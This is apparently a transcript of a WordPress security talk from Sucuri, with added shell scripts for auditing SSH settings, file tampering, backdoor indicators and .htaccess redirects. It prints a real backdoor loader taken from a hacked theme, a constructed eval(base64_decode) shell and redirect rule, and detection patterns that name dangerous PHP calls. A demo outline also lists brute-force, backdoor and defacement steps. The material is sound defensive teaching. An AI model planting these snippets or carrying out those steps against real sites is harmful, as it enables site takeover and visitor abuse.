WordPress Security: Dealing with Today’s Hacks
TRANSCRIPT
04/11/2023@sucuri_security @perezbox #wclv
SUCURI@WORDCAMP# WHOIS PEREZBOX
ID: Tony Perez
WHO: The Hulk
Username: Perezbox
Process: Sucuri
Services: InfoSec, Harleys, MMA, Guns
GeoIP: Menifee, California
Why listen to me? You don’t have to, but…
I am not a designer or developer, my passion is Information Security, specifically Web Security
Not an expert, passionate enthusiast
I don’t like people, I like packets, signatures and terminal.
Seriously though, our company:
Remediates 200–300 infected websites a day, 24/7/365
Performs 2 million+ malware website scans a month
Supports all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc.)
Thoughts To Kick Things Off
Information Security is about risk reduction.
If you’re looking for the “silver bullet” this is the wrong talk for you.
To think that you will never be infected or that you are immune to hacks is like saying you will never be sick.
If someone tells you the opposite you should slap them and have them pay you for wasting your time.
Prevention is ideal, detection is key… bats were created for ________ people…
Know Your Enemy
They have more time and resources
They are intelligent
Majority of attacks are automated
Goal is to impact as many people as possible
Mindset – Own one, own them all…
It’s not personal, it’s business…
Ok, so what’s the problem?
TODAY’s ISSUES:
The Ecosystem / Environment
Access Control
Software Vulnerabilities
Administration
Credential Management
Extensibility
Today’s Focus
Ecosystem / Environment
Access Control
Dealing with Hacks
The EcoSystem / Environment
Apache: malicious module injects iFrames
http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
phpMyAdmin: mirror hacked (a backdoored copy served to downloaders)
http://sourceforge.net/blog/phpmyadmin-back-door/
PHP-CGI: remote code execution
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
Plesk: vulnerable to SQLi attacks
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
Uh, what about WordPress?
Logical Architecture (the stack, bottom to top)
Linux Operating System
Apache + modules
PHP + modules
MySQL
Applications on top: WordPress, cPanel, Plesk, phpMyAdmin, PHP-CGI
The EcoSystem / Environment
What can you do? Not much… it is completely outside of your control if you’re using a shared or managed host
But you can reduce risk: use a Dedicated / VPS environment
But recognize the responsibility that this entails; if what I mentioned previously doesn’t make sense, skip to the next step
Go with a Managed Host: it doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on
Access is Key
On the Server:
Kill accounts that are not in use
FTP is the devil – slap yourself and switch to SFTP
Filter Shell / SFTP by IP & keys; keys at a minimum
Disable authentication via passwords on the server (only after you have confirmed your key login works)
WordPress Admin:
Multi-Factor Authentication on wp-admin
Apache “Basic Access Authentication” in front of wp-admin
Two-Factor Authentication on wp-login.php (Duo Two-Factor Authentication plugin)
Employ least privilege:
Users with the “administrator” role are not needed for every day tasks
Learn to use Editor, Author, Contributor, Subscriber
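The server-side items above can be checked rather than remembered. The script below is an added example for this write-up, not a script from the talk or from Sucuri: it reads an sshd_config and reports which of the slide’s settings are still weak (password logins, keyboard-interactive logins that PAM can turn back into password prompts, root login, and the absence of an AllowUsers/AllowGroups list, which is where the “filter by IP” part lives via user@host patterns). The two sample configs, the user names and the addresses in them are constructed for the example; it assumes the standard “Keyword value” syntax with no Match blocks.

```shell
#!/bin/sh
# Added example (not from the talk): audit an sshd_config for the access
# settings the slide asks for. Assumption: plain "Keyword value" lines, no
# Match blocks; sshd honours the first uncommented occurrence of a keyword,
# which is what sshd_opt returns.

# sshd_opt FILE KEYWORD -> effective value of KEYWORD (lower-cased), or empty
sshd_opt() {
    grep -iE "^[[:space:]]*$2([[:space:]]|\$)" "$1" 2>/dev/null |
        head -n 1 | awk '{print tolower($2)}'
}

# audit_sshd FILE -> one line per weak setting; exit status = number found
audit_sshd() {
    f=$1; n=0
    v=$(sshd_opt "$f" PasswordAuthentication)
    [ "$v" = "no" ] || { echo "WEAK: PasswordAuthentication=${v:-unset}"; n=$((n+1)); }
    # with UsePAM, keyboard-interactive still prompts for a password unless this is off
    v=$(sshd_opt "$f" ChallengeResponseAuthentication)
    [ "$v" = "no" ] || { echo "WEAK: ChallengeResponseAuthentication=${v:-unset}"; n=$((n+1)); }
    v=$(sshd_opt "$f" PubkeyAuthentication)
    [ "${v:-yes}" = "yes" ] || { echo "WEAK: PubkeyAuthentication=$v"; n=$((n+1)); }
    v=$(sshd_opt "$f" PermitRootLogin)
    case "$v" in
        no|prohibit-password|without-password) ;;
        *) echo "WEAK: PermitRootLogin=${v:-unset}"; n=$((n+1)) ;;
    esac
    # an explicit allow-list; entries may be user@host to pin a source address
    if ! grep -qiE '^[[:space:]]*Allow(Users|Groups)[[:space:]]' "$f"; then
        echo "WEAK: no AllowUsers/AllowGroups allow-list"; n=$((n+1))
    fi
    return $n
}

# Constructed sample configs: a stock-looking one and a hardened one.
TMP=$(mktemp -d)
WEAK_CFG=$TMP/weak_sshd_config
HARD_CFG=$TMP/hard_sshd_config
cat > "$WEAK_CFG" <<'EOF'
# constructed sample: everything left at defaults
Port 22
#PasswordAuthentication no
PermitRootLogin yes
UsePAM yes
EOF
cat > "$HARD_CFG" <<'EOF'
# constructed sample: what the slide asks for (names/addresses are placeholders)
Port 22
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
AllowUsers deploy@203.0.113.0/24 tony@198.51.100.7
EOF

audit_sshd "$WEAK_CFG" || echo "weak config: $? finding(s)"
audit_sshd "$HARD_CFG" && echo "hardened config: ok"
```

Run it against /etc/ssh/sshd_config on the box; a non-zero exit is the count of findings, so it drops straight into a cron job or a deployment check. Restart sshd only after a second session has confirmed key login works, since the hardened settings lock out anyone without a key.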
Gah!?!?!?!?!?!?!
WordPress Loving Infections
Defacements
Backdoors
Pharma Hack
Injections (iFrames specifically)
Malicious Redirects
Phishing
Before We Dive In
LINUX / UNIX tools:
curl
find
grep
diff
Command Usage – Hunting TimThumb
Find every copy and its version string:
# grep -Eir --include '*thumb.php' 'define.*VERSION' .
- Then – overwrite each outdated copy with the current one (save only the response body; dumping headers with -D - would write them into the file too):
# curl -A "Windows" -o /path-to-file/timthumb.php http://timthumb.googlecode.com/svn/trunk/timthumb.php
Command Usage – Identify Change
Detect Recent Changes
find /var/www -type f -ctime -1 | more   - OR -   find /var/www -type f -mtime -1
-ctime -1 = inode changed (content or metadata) in the last 24 hours; -ctime -2 = last 48 hours
-mtime -1 = content modified in the last 24 hours; -mtime -2 = last 48 hours
Prefer -ctime: an attacker can backdate mtime with touch, but ctime is set by the kernel and cannot be reset that way
Detect Differences (against a clean copy of the same WordPress version, or your last known-good backup)
diff -qr /path/dir1 /path/dir2
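The diff -qr check above only tells you that two files differ. The script below is an added example for this write-up, not from the talk or from Sucuri: it hashes a suspect WordPress tree and a known-clean copy and reports files that were added, removed or modified, so the report is the worklist. It assumes sha256sum is available (GNU coreutils) and that paths contain no whitespace; the sample trees, file names and the dropped count33.php are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the talk): hash-based comparison of a suspect
# WordPress tree against a clean copy. Unlike mtime this cannot be defeated
# by touch. Assumptions: sha256sum exists; no whitespace in paths.

# manifest DIR -> lines of "<sha256>  ./relative/path", sorted by path
manifest() {
    (cd "$1" && find . -type f -exec sha256sum {} + | sort -k2)
}

# compare_trees CLEAN SUSPECT -> "ADDED|REMOVED|MODIFIED <path>" lines, sorted
compare_trees() {
    m1=$(mktemp); m2=$(mktemp)
    manifest "$1" > "$m1"
    manifest "$2" > "$m2"
    awk 'NR == FNR { clean[$2] = $1; next }       # first file: clean hashes
         !($2 in clean)  { print "ADDED    " $2; next }
         clean[$2] != $1 { print "MODIFIED " $2 }
         { seen[$2] = 1 }
         END { for (p in clean) if (!(p in seen)) print "REMOVED  " p }' \
        "$m1" "$m2" | sort
    rm -f "$m1" "$m2"
}

# Constructed sample: a tiny "clean" install and a copy with typical tampering.
BASE=$(mktemp -d)
CLEAN=$BASE/clean; SUSPECT=$BASE/suspect
mkdir -p "$CLEAN/wp-includes" "$CLEAN/wp-content/themes/twentyeleven"
printf '<?php\n// constructed stand-in for a core file\n' > "$CLEAN/index.php"
printf '<?php\n$wp_version = "0.0.0-sample";\n' > "$CLEAN/wp-includes/version.php"
printf '<?php\n// constructed theme header\n' > "$CLEAN/wp-content/themes/twentyeleven/header.php"
printf 'readme\n' > "$CLEAN/readme.html"
cp -R "$CLEAN" "$SUSPECT"
# what a compromise usually leaves: a tampered theme file, a PHP file dropped
# under uploads, and a deleted readme (hides the version string)
printf '<?php echo "injected"; ?>\n' >> "$SUSPECT/wp-content/themes/twentyeleven/header.php"
mkdir -p "$SUSPECT/wp-content/uploads"
printf '<?php\n// constructed dropped file\n' > "$SUSPECT/wp-content/uploads/count33.php"
rm "$SUSPECT/readme.html"

compare_trees "$CLEAN" "$SUSPECT"
```

For a real site, point CLEAN at a freshly downloaded WordPress of the same version (core files) or at your last backup (the whole tree); anything listed as ADDED under wp-content/uploads deserves the first look, because nothing there should ever be PHP.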
Defacements
Hacktivism at its finest… you now support a cause!?!?!
Defacements
Hacktivism 101: Annoying as S*&T
Places to look:
index.html / index.php in the root directory
wp-content
Theme directory
grep is your friend – search the whole tree for the defacer’s handle or slogan, e.g.: grep -ri 'sniper399' .
Backdoors
It’s ok to cry a little…
Backdoors
Common terms (PHP functions and strings worth grepping for):
is_bot
eval
base64_decode
fopen
fclose
readfile
edoced_46esab (base64_decode spelled backwards; un-hidden at runtime with strrev)
exec
system
shell_exec
gzuncompress
popen
FilesMan
grep -RlE --include='*.php' '(^|[^A-Za-z0-9_])(system|exec|passthru|shell_exec|base64_decode|eval|popen|gzuncompress|create_function)[[:space:]]*\(' /var/www
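One grep over a whole docroot returns hundreds of legitimate hits, so triage needs a score. The script below is an added example for this write-up, not from the talk or from Sucuri: it counts, per PHP file, the lines that match each class of indicator from the list above (dangerous calls, decoders, reversed names and the FilesMan marker, long base64-looking blobs, and request superglobals) and prints the files that scored, highest first. The two sample files and their paths are constructed for the example; the scoring weights are a starting point, not a rule.

```shell
#!/bin/sh
# Added example (not from the talk): score PHP files by the backdoor
# indicators on the slide. Each indicator adds the number of lines it
# matches; files that score 0 are not printed. Uses POSIX ERE only.

# php_score FILE -> prints an integer score (0 = nothing suspicious)
php_score() {
    f=$1; s=0
    for re in \
        '(^|[^A-Za-z0-9_])(eval|assert|create_function|system|exec|passthru|shell_exec|popen|proc_open)[[:space:]]*\(' \
        '(base64_decode|gzuncompress|gzinflate|str_rot13|strrev)[[:space:]]*\(' \
        'edoced_46esab|FilesMan' \
        '[A-Za-z0-9+/=]{120,}' \
        '\$_(GET|POST|REQUEST|COOKIE)\['
    do
        c=$(grep -cE "$re" "$f" || true)   # grep -c prints 0 on no match
        s=$((s + c))
    done
    echo "$s"
}

# scan_php DIR -> "score path" for every PHP file that scored, highest first
scan_php() {
    find "$1" -type f -name '*.php' | while read -r f; do
        s=$(php_score "$f")
        [ "$s" -gt 0 ] && echo "$s $f"
    done | sort -rn
}

# Constructed samples: an ordinary plugin file and a dropped backdoor shape.
BASE=$(mktemp -d)
GOOD=$BASE/wp-content/plugins/good/good.php
BAD=$BASE/wp-content/uploads/2012/05/.cache.php
mkdir -p "$(dirname "$GOOD")" "$(dirname "$BAD")"
cat > "$GOOD" <<'EOF'
<?php
// constructed: an ordinary plugin file that calls nothing suspicious
function good_plugin_greeting( $name ) {
    return 'Hello, ' . esc_html( $name );
}
EOF
cat > "$BAD" <<'EOF'
<?php
// constructed: the shape of a dropped backdoor, with several of the slide's
// indicators on two lines (nothing here decodes to a real payload)
if (isset($_REQUEST['c'])) { eval(base64_decode($_REQUEST['c'])); }
$fn = strrev('edoced_46esab');
EOF
# a 120-character base64-looking blob, appended so the heredoc stays literal
blob=$(awk 'BEGIN { for (i = 0; i < 30; i++) printf "QUJD" }')
printf '$p = "%s";\n' "$blob" >> "$BAD"

scan_php "$BASE"
```

Run scan_php against the docroot and read the top of the list first. Two things in the output are signals on their own: any .php file under wp-content/uploads (find wp-content/uploads -name '*.php' is a one-liner worth running daily), and hidden files like the .cache.php above that a directory listing does not show.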
Pharma Hack
Erectile Dysfunction pills are leading ads.. Who knew..
Pharma Hack
Multi-million $ business
Rarely distributes malware
Impression-based affiliate marketing
Google’s Search Engine Result Pages (SERP)
Odds of malware distribution are actually low
Tricks:
Embedded within core files
Look for “.tmp” directories
Pharma Hack, cntd..
The spam is usually served only to search engines, so a normal browser sees a clean page. Try using curl to emulate Googlebot (and a Windows user agent):
curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
Google Webmaster Tools: Fetch as Googlebot
Check your theme’s index.php for things like this (the “image” s.jpg is PHP source; create_function compiles and runs it, with @ suppressing any errors):
<?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
Pharma Hack, cntd..
Injections
It only hurts for a minute…
Injections
Invisible iFrames executing in your visitors’ browsers
Contributing to drive-by downloads, pharma, XSS, CSRF
Places to check – the files that generate page output: JS files, header.php, index.php, functions.php, footer.php
Injections, cntd…
PHP iFrame injection => Count##.php
Check all index.php / theme JS files
Example below:
Injections, cntd…
Pharma Link Injections =>
Drive-By-Downloads
Malicious Redirects
WTF?!?! Why don’t I understand what it says?
Malicious Redirects
Redirects your user to a domain distributing malware; fundamentally different from an iFrame injection, which executes in the visitor’s browser
8 out of 10 times, check your .htaccess file – all of them, not just the one in the docroot:
# find /var/www -name .htaccess -type f | wc -l
Check for backdoors also – a redirect is often a sign of a bigger issue
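Counting the .htaccess files tells you how many to read; the script below is an added example for this write-up, not from the talk or from Sucuri, that reads them for you. It finds every .htaccess under a docroot and prints the directives that make up a conditional redirect: RewriteCond tests on the referrer or user agent (so only visitors coming from a search engine get bounced and the owner never sees it), RewriteRule/Redirect targets that point to another host, and ErrorDocument directives that send 404s off-site. The sample files and the redirect.example host are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the talk): list the redirect-related directives in
# every .htaccess under ROOT. Output is "<file>:<line>:<directive>".

# htaccess_findings ROOT -> one line per suspicious directive
htaccess_findings() {
    find "$1" -type f -name .htaccess | while read -r f; do
        grep -nE \
            -e 'RewriteCond[[:space:]]+%\{HTTP_(REFERER|USER_AGENT)\}' \
            -e '(RewriteRule|Redirect(Match)?)[[:space:]].*https?://' \
            -e 'ErrorDocument[[:space:]]+[0-9]+[[:space:]]+https?://' \
            "$f" | sed "s|^|$f:|"
    done
}

# Constructed sample docroot: the stock WordPress .htaccess in the root and a
# conditional redirect dropped into wp-content/uploads.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/wp-content/uploads"
cat > "$ROOT/.htaccess" <<'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
cat > "$ROOT/wp-content/uploads/.htaccess" <<'EOF'
# constructed: the pattern the slide describes - only visitors arriving from a
# search engine are bounced to the attacker's host (a reserved .example name)
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule .* http://redirect.example/go.php [R=302,L]
ErrorDocument 404 http://redirect.example/404.php
EOF

htaccess_findings "$ROOT"
```

Your own canonical-host or HTTPS redirects will show up too; the point is that every line printed is one you should be able to explain. An .htaccess in a directory that should only hold images, like uploads, is suspicious before you even read it.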
Phishing
Biggest growing problem, exceptionally difficult to detect…
Phishing
Growing at a faster pace than traditional web-malware
No impact to readers, but tied to SPAM bots sending out emails like this:
Phishing, cntd…
Demonstration
Bringing the Point Home
Demo Objective
Use good tools for bad things – wpscan
Enumerate the users
Brute force the user accounts’ passwords
Insert an arbitrary backdoor shell for remote execution
Deface the website
Insert another shell backdoor that provides an interface
I have 5 minutes – Ready?
Keeping it Real
Remember the risk discussion?
Guard Access
Revisit Slide 12 – access, access, access
It always comes down to access
We have to change the way we treat and think about access. All access – Server / Application
We are going through the same mistakes servers and desktops were making in the 90’s with access.
Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?
Password Dilemma
15 character pass: 3 months to crack
Long / Complex / Unique – the key to passwords
Prefer a password manager (you don’t? ok..)
Passphrases work too: iLuvWCLVegas:2012:HrtAttckGrll
Come up with a process that works, stick to it:
One scheme: remember 8 characters, write down 8 characters, save 20 characters
Second scheme: remember 20 characters, prefix them with the site name, end the sequence with some date
Kill PHP Execution
Drop an .htaccess with the block below into the directories that should never serve PHP directly:
wp-includes
wp-content
uploads (wp-content/uploads) – at a minimum
<Files *.php>
Deny from all
</Files>
This is Apache 2.2 syntax; on Apache 2.4 use “Require all denied” in place of “Deny from all”. Blocking all of wp-content can break plugins that are requested directly by the browser, so test it before rolling it out; uploads alone is safe and is where dropped shells usually land.
Disable Theme / Plugin Editor
I’d take it a step further and remove the ability to install, but that’s just me.
Modify wp-config.php with:
Disable the Plugin / Theme editor:
define('DISALLOW_FILE_EDIT', true);
- OR -
Disable plugin / theme update and installation (this also disables the editor, so it implies the line above):
define('DISALLOW_FILE_MODS', true);
Update
Oldest version found in production – 1.5
Leading cause of cross-site contamination issues
Perhaps the simplest of tasks, yet we still find this:
Plugins That Help
Clients:
Sucuri Security Premium
Duo Two-Factor Authentication
Theme-Check
BackupBuddy
Akismet
Non-Clients:
Duo Two-Factor Authentication
Limit Login Attempts
Theme-Check
BackupBuddy
Akismet
Need a Hand?
Online Resources:
Sucuri Blog: http://blog.sucuri.net
SiteCheck Scanner: http://sitecheck.sucuri.net
Unmask Parasites: http://unmaskparasites.com
Perishable Press: http://perishablepress.com/category/web-design/security/
Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
Support Forums:
Hacked: http://wordpress.org/tags/hacked
Malware: http://wordpress.org/tags/malware
BadwareBusters: https://badwarebusters.org
Sucuri
Tony Perez
http://sucuri.net | http://blog.sucuri.net
Twitter: @sucuri_security, @perezbox and @tonyonsecurity